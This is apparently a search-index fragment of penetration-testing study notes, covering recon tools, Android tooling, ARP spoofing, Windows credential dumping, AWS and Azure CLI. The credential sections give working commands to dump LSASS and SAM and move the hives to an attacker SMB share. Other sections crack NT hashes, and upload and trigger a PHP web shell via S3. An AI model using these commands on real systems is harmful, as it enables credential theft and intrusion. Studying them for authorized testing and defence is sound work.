                        amass enum -active -d crapi.apisec.ai  -ip -brute -dir path/to/save/results/\n# enum: Perform ACTIVE enumerations and network mapping\n# -ip: Show IP addresses of cached subdomains.\n# -brute: Perform a brute-force DNS attack.\n\namass enum -passive -d crapi.apisec.ai -src  -dir path/to/save/results/\n# enum: Perform PASSIVE enumerations and network mapping.\n# -src: Display sources of the host domain.\n# -dir: Specify a folder to save results.\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumerations. Passive fingerprinting.\n

                        Some flags:

                        -active: Attempt zone transfer and certificate name grabs.\n-passive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: to specify a domain\n-ip: Show IP addresses of cached subdomains.\n--include-unresolvable: output DNS names that did not resolve.\n-o file.txt: To output the result into a file\n-w: path to a different wordlist file\n

                        Also, to be more precise:

                        amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

                        Amass has several useful command-line options. Use the intel command to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses:

                        amass intel -addr [target IP addresses]\n

                        If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

                        amass intel -d [target domain] --whois\n

                        This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

                        amass enum -passive -d [target domain]\n

                        The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

                        amass enum -active -d [target domain]\n

                        To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

                        amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
                        ","tags":["dns enumeration","enumeration","tools"]},{"location":"android-debug-bridge/","title":"Android Debug Bridge - ADB","text":"

                        ADB or Android Debug Bridge is a command-line tool developed to facilitate communication between a computer and a connected emulator or Android device. ADB works with the aid of three components called Client, Daemon, and Server.

                        • Client: the computer from which you issue ADB commands via a command-line terminal; it sends the commands.
                        • Daemon (adbd): a background process that runs on the connected device and is responsible for executing commands on the connected emulator or Android device.
                        • Server: runs in the background and works as a bridge between the client and the daemon, managing the communication between them.
                        ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#basic-commands","title":"Basic commands","text":"
                        # Activate remote shell command console on the connected Android smartphone or tablet.\nadb shell\n\n# List Android devices connected to your computer\nadb devices\n# -l: to list devices by model or product number\n\n# Connect to device\nadb connect\n\n# List Android devices connected and emulators in your computer\nshow devices\n\n# Remove a package\npm uninstall --user 0 com.package.name\n\n# Remove a package but leave app data \npm uninstall -k --user 0 com.package.name\n# -k: Keep the app data and cache after package removal\n\n# Reinstall an uninstalled system app\ncmd package install-existing com.package.name\n
                        ","tags":["mobile pentesting"]},{"location":"android-debug-bridge/#howtos","title":"Howtos","text":"
                        • Remove bloatware from android device.
                        ","tags":["mobile pentesting"]},{"location":"apktool/","title":"apktool","text":"","tags":["mobile pentesting","tools"]},{"location":"apktool/#installation","title":"Installation","text":"

                        Go to your tool folder and download the tool:

                        wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.6.0.jar\n

                        Have the device from genymotion already running on Host-Only mode + NAT.

                        Have your kali on Host-Only mode + NAT.

                        Run:

                        adb connect <the device Host-Only IP>:5555\n\n# Make sure that genymotion is not using a proxy\nadb shell settings put global http_proxy :0\n\n# Install the app\nadb install nameOfApp\n

                        To decompile and see source code:

                        java -jar apktool_2.6.0.jar d -s nameOfApp\n# d: decompile\n# -s: do not decode sources (keeps classes.dex intact)\n

                        When decompiled, a folder is created. Inside it you will find the file classes.dex, which contains the compiled (Dalvik) code. To browse it as decompiled source:

                        jadx-gui\n
                        ","tags":["mobile pentesting","tools"]},{"location":"apt-packet-manager/","title":"Package Manager (APT)","text":"
                        # Search for a package or text string:\napt search <text_string>\n\n# Show package information:\napt show <package>\n\n# Show package dependencies:\napt depends <package>\n\n# Show the names of all the packages installed in the system:\napt list --installed\n\n# Install a package:\napt install <package>\n\n# Uninstall a package:\napt remove <package>\n\n# Delete a package including its configuration files:\napt purge <package>\n\n# Delete automatically those packages that are not being used (be careful with this command; due to apt's dependency hell it may delete unwanted packages):\napt autoremove\n\n# Update the repositories information:\napt update\n\n# Update a package to the last available version in the repository:\napt upgrade <package>\n\n# Update the full distribution. It will update our system to the next available version:\napt full-upgrade\n\n# Clean caches, downloaded packages, etc:\napt clean && apt autoclean\n
                        ","tags":["bash"]},{"location":"aquatone/","title":"Aquatone - Automatize web scanner in large subdomain lists","text":"

                        Aquatone is a tool for automatic and visual inspection of websites across many hosts and is convenient for quickly gaining an overview of HTTP-based attack surfaces by scanning a list of configurable ports, visiting the website with a headless Chrome browser, and taking a screenshot. This is helpful, especially when dealing with huge subdomain lists.

                        sudo apt install golang chromium-driver\n\ngo get github.com/michenriksen/aquatone\n\nexport PATH=\"$PATH\":\"$HOME/go/bin\"\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"aquatone/#basic-usage","title":"Basic usage","text":"
                        cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"arjun/","title":"Arjun","text":"","tags":["api","tools"]},{"location":"arjun/#installation","title":"Installation","text":"
                        sudo git clone https://github.com/s0md3v/Arjun.git\n

                        Other ways:

                        pip3 install arjun\n
                        ","tags":["api","tools"]},{"location":"arjun/#basic-commands","title":"Basic commands","text":"
                        # Run arjun against a single URL\narjun -u https://api.example.com/endpoint\n\n# arjun will provide you with likely parameters from a wordlist. Its results are based on the deviation of response lengths/codes\narjun --headers \"Content-Type: application/json\" -u http://api.example.com/register -m JSON --include='{$arjun$}' --stable\n# -m Set method parameters GET/POST/JSON/XML\n# -i Import targets (a txt list)\n# --include Specify injection point, for example:\n        #  --include='<?xml><root>$arjun$</root>\n        #  --include='{\"root\":{\"a\":\"b\",$arjun$}}'\n

                        Awesome wiki about arjun usage: https://github.com/s0md3v/Arjun/wiki/Usage.

                        ","tags":["api","tools"]},{"location":"arp-poisoning/","title":"Arp poisoning","text":"

                        This attack is performed by sending gratuitous ARP replies.

                        ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arp-poisoning/#intercepting-smb-traffic","title":"Intercepting SMB traffic","text":"

                        We'll be using the arpspoof tool, included in dsniff.

                        ","tags":["windows","linux","arp","arp poisoning"]},{"location":"arpspoof-dniff/","title":"arpspoof from dniff","text":"

                        dsniff is a collection of tools for network auditing and penetration testing. It includes arpspoof, a utility designed to intercept traffic on a switched LAN.

                        Before running it, enable Linux kernel IP forwarding (this turns the Linux box into a router).

                        echo 1 > /proc/sys/net/ipv4/ip_forward\n

                        And then, run arpspoof:

                        arpspoof -i <interface> -t $ip -r <host IP>\n# interface: NIC you want to use (like eth0 for your local LAN, or tap0 for Hera Lab)\n# target IP: one of the victims' addresses\n# host IP: the other victim's address\n

                        After that, run Wireshark to intercept the traffic.

                        • SMB traffic. When capturing smb traffic in wireshark, go to: FILE>Export Objects>SMB/SMB2. There you have all files uploaded or downloaded from a server during a SMB capture session.
                        • Telnet traffic: Telnet sends characters one by one, which is why you don't see the username/password straight away. With \"Follow TCP Stream\", Wireshark will put all the data together and you will be able to see the username/password. Just right-click on a packet of the telnet session and choose \"Follow TCP Stream\".
                        ","tags":["windows","tools"]},{"location":"attacking-lsass/","title":"Attacking LSASS","text":"

                        See Windows credentials storage.

                        "},{"location":"attacking-lsass/#dumping-lsass-process-memory","title":"Dumping LSASS Process Memory","text":"

                        There are several methods to dump LSASS process memory.

                        "},{"location":"attacking-lsass/#1-task-manager-method","title":"1. Task manager method","text":"

                        Open Task Manager. In the Processes tab, search for Local Security Authority Process. Right-click on it and select Create dump file. A file called lsass.DMP is created and saved in:

                        C:\\Users\\loggedonusersdirectory\\AppData\\Local\\Temp\n

                        Transfer file to attacking machine.
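
                        One hedged way to do the transfer, mirroring the SMB-share approach used elsewhere in these notes (paths and share name are illustrative):

                        # On the attacker machine, expose a share named CompData\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n\n# On the target, move the dump onto the share\nmove C:\Users\loggedonusersdirectory\AppData\Local\Temp\lsass.DMP \\$ipAttacker\CompData\n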

                        "},{"location":"attacking-lsass/#rundll32exe-comsvcsdll-method","title":"Rundll32.exe & Comsvcs.dll method","text":"

                        Modern anti-virus tools recognize this method as malicious activity.

                        # Finding LSASS PID in cmd\ntasklist /svc\n\n# Finding LSASS PID in PowerShell\nGet-Process lsass\n\n# Creating lsass.dmp using PowerShell\nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump <PID> C:\\lsass.dmp full\n# With this command, we are running rundll32.exe to call an exported function of comsvcs.dll which also calls the MiniDumpWriteDump (MiniDump) function to dump the LSASS process memory to a specified directory (C:\\lsass.dmp). \n

                        Transfer file to attacking machine.

                        "},{"location":"attacking-lsass/#3-pypykatz","title":"3. Pypykatz","text":"

                        pypykatz parses the secrets hidden in the LSASS process memory dump.

                        pypykatz lsa minidump /home/path/lsass.dmp \n
                        "},{"location":"attacking-lsass/#crack-the-file","title":"Crack the file","text":""},{"location":"attacking-lsass/#cracking-the-nt-hash-with-hashcat","title":"Cracking the NT Hash with Hashcat","text":"
                        sudo hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt\n
                        "},{"location":"attacking-sam/","title":"Attacking SAM","text":"

                        See Windows credentials storage.

                        "},{"location":"attacking-sam/#dumping-sam-locally","title":"Dumping SAM Locally","text":""},{"location":"attacking-sam/#1-copying-sam-registry-hives","title":"1. Copying SAM Registry Hives","text":"

                        There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes.

                        Registry Hive Description hklm\\sam Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext. hklm\\system Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database. hklm\\security Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

                        Launching CMD as an admin will allow us to run reg.exe to save copies of the registry hives.

                        reg.exe save hklm\sam C:\sam.save\n\nreg.exe save hklm\system C:\system.save\n\nreg.exe save hklm\security C:\security.save\n

                        Transfer the registry hives to our attacker machine, for instance, with smbserver.py from impacket.

                        # From the attacker machine (our kali) all we must do to create the share is run smbserver.py -smb2support using python, give the share a name (CompData) and specify the directory to share\n#########################################\nsudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/\n\n# From the victim's machine (windows)\n#########################################\nmove sam.save \\$ipAttacker\CompData\nmove system.save \\$ipAttacker\CompData\nmove security.save \\$ipAttacker\CompData\n
                        "},{"location":"attacking-sam/#2-dumping-hashes-with-impackets-secretsdumppy","title":"2. Dumping Hashes with Impacket's secretsdump.py","text":"
                        locate secretsdump \n
                        python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n

                        Secretsdump dumps the local SAM hashes and would've also dumped the cached domain logon information if the target was domain-joined and had cached credentials present in hklm\\security.

                        The first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database.

                        Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n(username:rid:lmhash:nthash)\n

                        Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS. Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords.

                        "},{"location":"attacking-sam/#3-cracking-hashes-with-hashcat","title":"3. Cracking Hashes with Hashcat","text":"

                        See hashcat:

                        # Adding nthashes to a .txt File\n# Copy paste them in hashestocrack.txt\n\n# Hashcat them\nsudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt\n# -m 1000: select module for NT hashes\n
                        "},{"location":"attacking-sam/#dumping-sam-remotely","title":"Dumping SAM Remotely","text":""},{"location":"attacking-sam/#with-crackmapexec","title":"With CrackMapExec","text":"

                        With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network.

                        Cheat sheet of CrackMapExec.

                        crackmapexec smb $ip --local-auth -u <username> -p <password> --sam\n\ncrackmapexec smb $ip --local-auth -u <username> -p <password> --lsa\n
                        "},{"location":"aws-cli/","title":"AWS cli","text":"

                        The AWS CLI is a command-line tool for managing AWS services, including S3. S3 is an object storage service in the AWS cloud; with S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

                        ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#installation","title":"Installation","text":"
                        curl \"https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\" -o \"awscliv2.zip\"\nunzip awscliv2.zip\nsudo ./aws/install\n

                        Update version:

                        sudo ./aws/install --bin-dir /usr/local/bin --install-dir /usr/local/aws-cli --update\n

                        To access you will need access key. You generate access keys in AWS Dashboard.

                        aws configure  \nAWS Access Key ID [None]: a  \nAWS Secret Access Key [None]: a  \nDefault region name [None]: <region>  \nDefault output format [None]: text\n\n#######################\n###### Where\n#######################\n# - _AWS Access Key ID_ & _AWS Secret Access Key can be any random strings at least one character long,_\n# - _Default region name_ can be any region from [AWS\u2019s region list](https://aws.amazon.com/about-aws/global-infrastructure/regions_az/),\n# - _Default output format_ can be `json`, `yaml`, `yaml-stream`, `table` or `text`. As we are not expecting enormous amount of data, `text` should do just fine.\n
                        ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#basic-commands","title":"Basic commands","text":"
                        # Check version\naws --version\n\n# List IAM users (if you have permissions)\naws iam list-users --region <region>\n# --region is optional\n
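
                        When a target exposes its own S3 endpoint, the bucket can usually be enumerated before uploading anything (a sketch reusing the thetoppers.htb host from the example below):

                        # List buckets on a custom endpoint\naws --endpoint=http://s3.thetoppers.htb s3 ls\n\n# List the objects inside a bucket\naws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb\n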

                        Upload the file simpleshell.php to the S3 bucket thetoppers.htb:

                        aws --endpoint=http://s3.thetoppers.htb s3 cp simpleshell.php s3://thetoppers.htb\n
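
                        If the bucket is also the webroot served by the webserver, the uploaded shell can then be triggered over HTTP (hypothetical cmd parameter, assuming a simple $_GET-based PHP shell):

                        curl \"http://thetoppers.htb/simpleshell.php?cmd=id\"\n
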
                        # General syntax of any AWS CLI call\naws [service-name] [command] [args] [--flag1] [--flag2]\n
                        ","tags":["cloud","amazon","s3","aws"]},{"location":"azure-cli/","title":"Azure-CLI","text":"

                        The Azure CLI is a cross-platform (Windows, Linux, and macOS) command-line program for connecting to Azure and executing administrative commands on Azure resources from a terminal or script instead of a web browser.

                        All commands: https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest.

                        It\u2019s an executable program that you can use to execute commands in Bash. You can use the Azure CLI to perform every possible management task in Azure. Like Azure PowerShell, the CLI allows you to run one-off commands or you can combine them into a script and execute them together.


                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#installation","title":"Installation","text":"
                        • Linux: apt-get on Ubuntu, yum on Red Hat, and zypper on OpenSUSE
                        • Mac: Homebrew.

                        1. Modify your sources list so that the Microsoft repository is registered and the package manager can locate the Azure CLI package:

                        AZ_REPO=$(lsb_release -cs)\necho \"deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main\" | \\\nsudo tee /etc/apt/sources.list.d/azure-cli.list\n
                        2. Import the encryption key for the Microsoft Ubuntu repository. This allows the package manager to verify that the Azure CLI package you install comes from Microsoft.
                        curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n
                        3. Install the Azure CLI:
                        sudo apt-get install apt-transport-https\nsudo apt-get update\nsudo apt-get install azure-cli\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#basic-usage","title":"Basic usage","text":"

                        Run Azure-CLI

                        # Running Azure-CLI from Cloud Shell\nbash\n\n# Running Azure-CLI from Linux\naz\n

                        Basic commands to warm up:

                        # See installed version\naz --version\n\n# you can use the letters az to start an Azure command \naz upgrade\n\n# Launch Azure CLI interactive mode\naz interactive\n\n# Getting help. If you want to find commands that might help you manage a storage blob, you can use the find command:\naz find blob\n\n# If you already know the name of the command you want, the\u00a0`--help`\u00a0argument\naz storage blob --help\n

                        Commands in the CLI are structured in\u00a0groups\u00a0and\u00a0subgroups. Each group represents a service provided by Azure, and the subgroups divide commands for these services into logical groupings. For example, the\u00a0storage\u00a0group contains subgroups including\u00a0account,\u00a0blob, and\u00a0queue.
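
                        For example, account is a subgroup of the storage group, so a full command reads group-subgroup-command:

                        # List storage accounts in the current subscription, formatted as a table\naz storage account list --output table\n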

                        Because you're working with a local install of the Azure CLI, you'll need to authenticate before you can execute Azure commands by using the Azure CLI\u00a0login\u00a0command.

                        az login\n

                        The Azure CLI will typically launch your default browser to open the Azure sign-in page. After successfully signing in, you'll be connected to your Azure subscription.

                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#output-formatting","title":"Output formatting","text":"
                        # Results in a json format by default\naz group list\n\n# Results in a line format\naz group list --out tsv\n\n# Results in a table\naz group list --out table\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#resource-groups","title":"Resource groups","text":"
                        # List resource groups\naz group list\n# remember you can format output\n\n# List all your resource groups in a table:\naz group list --output table\n\n# Return in json all my resources in my resource group:\naz group list --query \"[?name == '$RESOURCE_GROUP']\"\n\n\n# Retrieve properties from an existing and known resource group\naz group show --name myresourcegroup\n\n# From a specific resource group (provided, for instance, its name), query a value. Querying location:\naz group show --name <name> --query location --out table\n\n# Querying id\naz group show --name <name> --query id --out table\n\n# Create a Resource group\naz group create --name <name> --location <location>\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#disk","title":"Disk","text":"
                        # List disks\naz disk list\n\n# Retrieve the properties of an existing Disk\naz disk show --name myDiskname --resource-group rg-test2\n\n# Retrieve the properties of an existing Disk, and output it in a table\naz disk show --name myDiskname --resource-group rg-test2 --out table\n\n# Create a new disk\naz disk create --resource-group $myResourceGroup --name $mynewDisk --sku \"Standard_LRS\" --size-gb 32\n\n# Increase the size of a disk\naz disk update --resource-group $myResourceGroup --name $myDiskName --size-gb 64\n\n# Change standard SKU to premium\naz disk update --resource-group $myResourceGroup --name $myDiskName --sku \"Premium_LRS\"\n\n# Verify size of a disk by querying size\naz disk show --resource-group $myResourceGroup --name $myDiskName --query diskSizeGb --out table\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#vms","title":"VMs","text":"
                        # Check running VMs\naz vm list\n\n# List IP addresses\naz vm list-ip-addresses\n\n# Create a VM with UbuntuLTS\naz vm create --resource-group MyResourceGroup --name MyVM01 --image UbuntuLTS --generate-ssh-keys\n\n# Create a VM\naz vm create --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9 --name my-vm  --public-ip-sku Standard --image Ubuntu2204 --admin-username azureuser  --generate-ssh-keys\n\n# Restart existing VM\naz vm restart -g MyResourceGroup -n MyVm\n\n# Configure Nginx on your VM\naz vm extension set  --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9  --vm-name my-vm  --name customScript  --publisher Microsoft.Azure.Extensions  --version 2.1  --settings '{\"fileUris\":[\"https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\"]}'  --protected-settings '{\"commandToExecute\": \"./configure-nginx.sh\"}'\n\n# Create a variable with the public IP address: run the following az vm list-ip-addresses command to get your VM's IP address and store the result as a Bash variable:\nIPADDRESS=\"$(az vm list-ip-addresses --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --name my-vm --query \"[].virtualMachine.network.publicIpAddresses[*].ipAddress\" --output tsv)\"\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#nsg-network-security-groups","title":"NSG (Network Security Groups)","text":"
                        # Run the following\u00a0`az network nsg list`\u00a0command to list the network security groups that are associated with your VM:\naz network nsg list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --query '[].name' --output tsv\n\n# You see this:\n# my-vmNSG \n# Every VM on Azure is associated with at least one network security group. In this case, Azure created an NSG for you called\u00a0_my-vmNSG_.\n# Run the following\u00a0`az network nsg rule list`\u00a0command to list the rules associated with the NSG named\u00a0_my-vmNSG_:\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG\n\n# Run the\u00a0`az network nsg rule list`\u00a0command a second time. This time, use the\u00a0`--query`\u00a0argument to retrieve only the name, priority, affected ports, and access (**Allow**\u00a0or\u00a0**Deny**) for each rule. The\u00a0`--output`\u00a0argument formats the output as a table so that it's easy to read.\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --query '[].{Name:name, Priority:priority, Port:destinationPortRange, Access:access}' --output table\n# You see this:\n# Name              Priority    Port    Access\n# -----------------  ----------  ------  --------\n# default-allow-ssh  1000        22      Allow\n\n# By default, a Linux VM's NSG allows network access only on port 22. This enables administrators to access the system. You need to also allow inbound connections on port 80, which allows access over HTTP.\n# Run the following\u00a0`az network nsg rule create`\u00a0command to create a rule called\u00a0_allow-http_\u00a0that allows inbound access on port 80:\naz network nsg rule create --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --name allow-http --protocol tcp --priority 100 --destination-port-range 80 --access Allow\n

                        Script:

                        # The script under https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\n\n#!/bin/bash\n\n# Update apt cache.\nsudo apt-get update\n\n# Install Nginx.\nsudo apt-get install -y nginx\n\n# Set the home page.\necho \"<html><body><h2>Welcome to Azure! My name is $(hostname).</h2></body></html>\" | sudo tee -a /var/www/html/index.html\n

                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#app-service-plan","title":"App Service plan","text":"

                        Create variables:

                        export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

                        Create an App Service plan to run your app.

                        az appservice plan create --name $AZURE_APP_PLAN --resource-group $RESOURCE_GROUP --location $AZURE_REGION --sku FREE\n

                        Verify that the service plan was created successfully by listing all your plans in a table:

                        az appservice plan list --output table\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#web-app","title":"Web app","text":"

                        Create variables:

                        export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

                        Create a Web App

                        # Create web app\naz webapp create --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --plan $AZURE_APP_PLAN\n

                        List existing ones:

                        az webapp list --output table\n

                        Return HTTP address of my web app:

                        site=\"http://$AZURE_WEB_APP.azurewebsites.net\"\necho $site\n

                        Getting the default html for the sample web app:

                        curl $AZURE_WEB_APP.azurewebsites.net\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-code-from-github","title":"Deploy code from Github","text":"

                        Create variables:

                        export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

                        The goal is to deploy code from a GitHub repository to the web app.

                        az webapp deployment source config --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --repo-url \"https://github.com/Azure-Samples/php-docs-hello-world\" --branch master --manual-integration\n
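
                        Note that with --manual-integration the app is not redeployed automatically on new commits. A sketch of forcing a re-sync after the repository changes, reusing the variables above:

                        # Pull the latest commit from the configured repository\naz webapp deployment source sync --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP\n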

                        Once it's deployed, hit your site again with a browser or CURL:

                        curl $AZURE_WEB_APP.azurewebsites.net\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-an-arm-template","title":"Deploy an ARM template","text":"

                        Prerequisites:

                        # First, sign in to Azure by using the Azure CLI \naz login\n\n# define your resource group. \n    # 1. You can obtain available location values from: \naz account list-locations\n    # 2. You can configure the default location using \naz configure --defaults location=<location>\n    # 3. If nonexistent, create it\n    az group create --name {name of your resource group} --location \"{location}\"\n

                        Now, you are set. Deploy your ARM template:

                        templateFile=\"{provide-the-path-to-the-template-file}\"\naz deployment group create --name blanktemplate --resource-group myResourceGroup --template-file $templateFile\n

                        Use linked templates to deploy complex solutions. You can break a template into many templates and deploy these templates through a main template. When you deploy the main template, it triggers the linked template's deployment. You can store and secure the linked template by using a SAS token.
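
                        A minimal sketch of deploying a remote (linked) template secured with a SAS token; the storage account, container, and token below are placeholders:

                        # URI of the linked template plus its SAS token (placeholders)\ntemplateUri=\"https://mystorageaccount.blob.core.windows.net/templates/main.json?<sas-token>\"\n\naz deployment group create --name linkeddemo --resource-group myResourceGroup --template-uri $templateUri\n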

                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#aks","title":"AKS","text":"

                        Azure Container Registry

                        # Authenticate to an Azure Container Registry\naz acr login --name <acrName>\n# This logs you into the ACR using the token that was generated when your session first authenticated.\n

                        # Get the resource ID of your AKS cluster\nAKS_CLUSTER=$(az aks show --resource-group myResourceGroup --name myAKSCluster --query id -o tsv)\n\n# Get the account credentials for the logged in user\nACCOUNT_UPN=$(az account show --query user.name -o tsv)\nACCOUNT_ID=$(az ad user show --id $ACCOUNT_UPN --query objectId -o tsv)\n\n# Assign the 'Cluster Admin' role to the user\naz role assignment create --assignee $ACCOUNT_ID --scope $AKS_CLUSTER --role \"Azure Kubernetes Service Cluster Admin Role\"\n
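
                        With the role assigned, you would typically fetch admin credentials into your kubeconfig so kubectl can reach the cluster (a sketch, reusing the resource names above):

                        # Merge the cluster's admin credentials into ~/.kube/config\naz aks get-credentials --resource-group myResourceGroup --name myAKSCluster --admin\n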
                        # You create an application named App1 in an Azure tenant. You need to host the application as a multitenant application for any users in Azure, while restricting non-Azure accounts. You need to allow administrators in other Azure tenants to add the application to their gallery.\naz ad app create --display-name app1 --sign-in-audience AzureADMultipleOrgs\n
                        ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-powershell/","title":"Azure Powershell","text":"

                        See all available PowerShell releases: https://github.com/PowerShell/PowerShell/releases.

                        Azure powershell documentation: https://learn.microsoft.com/en-us/powershell/azure/?view=azps-10.3.0

                        Az\u00a0is the formal name for the Azure PowerShell module containing cmdlets to work with Azure features. It contains hundreds of cmdlets that let you control nearly every aspect of every Azure resource. You can work with the following features, and more: Resource groups, Storage, VMs, Azure AD, Containers, Machine learning.

                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#installation","title":"Installation","text":"
                        # Get version of the installed Az module\nGet-InstalledModule -Name Az -AllVersions | Select-Object -Property Name, Version\n\n# To install the Az module, run as Administrator\nInstall-Module -Name Az -AllowClobber -Repository PSGallery -Force\n\n# To update the Az module, run as Administrator\nUpdate-Module -Name Az -Force\n

                        You can have several versions of the Az PowerShell module installed at the same time.

                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#linux","title":"Linux","text":"
                        # Import the encryption key for the Microsoft Ubuntu repository. This key enables the package manager to verify that the PowerShell package you install comes from Microsoft.\ncurl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n\n# Register the Microsoft Ubuntu repository so the package manager can locate the PowerShell package:\nsudo curl -o /etc/apt/sources.list.d/microsoft.list https://packages.microsoft.com/config/ubuntu/18.04/prod.list\n\n# Update the list of packages:\nsudo apt-get update\n\n# Install PowerShell:\nsudo apt-get install -y powershell\n\n# Start PowerShell to verify that it installed successfully:\npwsh\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#basic-commands","title":"Basic commands","text":"

                        Cmdlets are shipped in modules. A PowerShell module is a package (typically a DLL or a set of script files) that includes the code to process each available cmdlet. Az is the formal name for the Azure PowerShell module, which contains cmdlets to work with Azure features.

                        # Load module\nGet-Module\n\n# Install Azure module\nInstall-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force\n\n# Update powershell module\nUpdate-Module -Name Az\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#managing-infrastructure","title":"Managing infrastructure","text":"

                        For an account to work, you need a subscription. Additionally, you will need to create several resources: a resource group, a storage account, and a file share.

                        # First, connect to your Azure account\nConnect-AzAccount\n\n# List your subscriptions \nGet-AzSubscription\n\n# Set a variable name for your subscription context and set context in Azure\n$context = Get-AzSubscription -SubscriptionId <ID>\n# Set context \nSet-AzContext $context\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#resource-groups","title":"Resource Groups","text":"
                        # List existing Resource Groups\nGet-AzResourceGroup\n\n# Create a new Resource group. Two things needed: a name and a location. Create variables for those:\n$location = (Get-AzResourceGroup -Name resource-group_test1).Location\n$rgName = \"myresourcegroup\"\nNew-AzResourceGroup -Name $rgName -Location $location\n\n# A way to assign a variable to location if you want to replicate an existing location from another resource group \n$location = (Get-AzResourceGroup -Name $rgName).Location\n\n\n# Delete resource groups\nRemove-AzResourceGroup -Name \"ContosoRG01\"\n
